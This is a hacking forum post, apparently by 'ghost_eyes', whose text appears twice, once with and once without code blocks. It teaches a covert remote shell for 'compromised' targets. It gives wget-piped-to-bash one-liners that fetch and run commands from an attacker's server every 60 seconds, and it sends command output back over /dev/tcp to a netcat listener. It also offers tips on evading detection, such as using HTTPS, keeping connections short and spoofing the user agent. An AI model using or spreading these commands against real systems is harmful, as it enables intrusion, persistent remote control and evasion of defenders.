This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems.
So basically what's going on is wget downloads the file with no output (-q flag) and instead of writing to a file like normal it pipes the output of the command to bash. The command on the web page is then executed. http://example.com would be a HTTP server you control. You could host a simple text file on with bash commands. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: "touch command.txt". Then put whatever command you want in the file. To list directory contents on the compromised system execute this command on your system: "echo "ls" > command.txt"
So that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script.
Save as a bash script (something.sh) and then execute it on target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one liner if you would rather not write the script to the target disk.
You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output:
This is better than your average TCP reverse shell. The reasons being, 1: HTTP(S) is less suspicious on a network than straight up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. Reason 2: The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like a HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag.
That's all for today boys and girls. Hope you enjoyed and thanks for reading.
- ghost_eyes
https://github.com/ghostwalkr
Code:
wget -q -O - http://example.com | bash
So basically what's going on is wget downloads the file with no output (-q flag) and instead of writing to a file like normal it pipes the output of the command to bash. The command on the web page is then executed. http://example.com would be a HTTP server you control. You could host a simple text file on with bash commands. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: "touch command.txt". Then put whatever command you want in the file. To list directory contents on the compromised system execute this command on your system: "echo "ls" > command.txt"
So that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script.
Code:
for i in {1..9999}
do
wget -q -O - http://example.com | bash
sleep 60
done
Save as a bash script (something.sh) and then execute it on target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one liner if you would rather not write the script to the target disk.
Code:
for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; done
You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output:
Code:
wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337
This is better than your average TCP reverse shell. The reasons being, 1: HTTP(S) is less suspicious on a network than straight up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. Reason 2: The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like a HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag.
That's all for today boys and girls. Hope you enjoyed and thanks for reading.
- ghost_eyes
https://github.com/ghostwalkr